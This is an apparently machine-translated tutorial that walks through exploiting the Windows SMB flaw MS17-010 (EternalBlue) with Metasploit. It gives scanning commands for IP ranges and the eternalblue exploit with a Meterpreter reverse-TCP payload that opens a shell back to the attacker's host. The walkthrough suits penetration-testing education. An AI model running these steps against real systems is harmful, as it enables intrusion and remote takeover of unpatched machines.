Eternal Blue

Eternal blue means 2017 year 4 month 14 Friday night , Hacker groups Shadow Brokers（ Shadow brokers ） Publish a large number of network attack tools , It includes “ Eternal Blue ” Tools ,“ Eternal Blue ” utilize Windows Systematic SMB The vulnerability can obtain the highest authority of the system .
Malicious code will scan open 445 Of the file share port Windows machine , No user action required , Just turn on the Internet , Lawbreakers can plant ransomware in computers and servers 、 Remote control Trojan 、 Malicious programs such as virtual currency mining machine .

Attack simulation

We now simulate the use of MS17_010( Blue hole of eternity ) Loophole attack ：
seek MS17_010 modular ： search ms17_010

Auxiliary Auxiliary detection module

The module will not directly establish access between the attacker and the target , They're only responsible for scanning , Sniffing , Fingerprint identification and other related functions to assist penetration testing .

 Enter the command ：
use auxiliary/scanner/smb/smb_ms17_010
 View the information that needs to be configured for this module ：show options

RHOSTS  The parameter is to probe the host ip or ip Range , We detect a ip Whether there are vulnerabilities in the host within the scope 
 Input ：
set RHOSTS 192.168.58.1 192.168.58.2
 perhaps 
set RHOSTS 192.168.58.1-192.168.58.9
 perhaps 
set RHOSTS 192.168.58.1/24 #C Segment detection  

 Input ：exploit  attack , Here you are + No. is the host that may have vulnerabilities .

Exploit Exploit module

 Select the vulnerability attack module ： 
use exploit/windows/smb/ms17_010_eternalblue 
 Check the information of this vulnerability ：info

 View the system platforms that can be attacked , This command shows which specific operating system versions the attack module targets 、 Language version of the system ：
show targets
 There's only one , Some other vulnerability modules have strict requirements on the language and version of the operating system , such as MS08_067, That's what we need 
 We specify the version of the target system . If not set ,MSF It will automatically help us determine the version and language of the target operating system ( utilize 
 Fingerprint characteristics of the target system )

Payload Attack load module

Attack payload is the code of the actual attack function that we expect the target system to complete after being infiltrated , After successfully penetrating the target , Used to run arbitrary commands on the target system .

 View attack payload ：show payloads
 This command can view all the data available under the current vulnerability exploitation module Payload

 Set attack load ：
set payload windows/x64/meterpreter/reverse_tcp
 View the parameters to be configured for the module ： 
show options

 Set up RHOST, That is to attack the host ip：set RHOST 192.168.0.103
 Set up LHOST, That is, our host's ip, Used to receive the data bounced back from the target shell：set LHOST 192.168.0.104
 If we don't set up here lport Words , The default is 4444 Port listening 
 attack ： exploit

appear WIN That is, the attack is successful , Return to the target shell.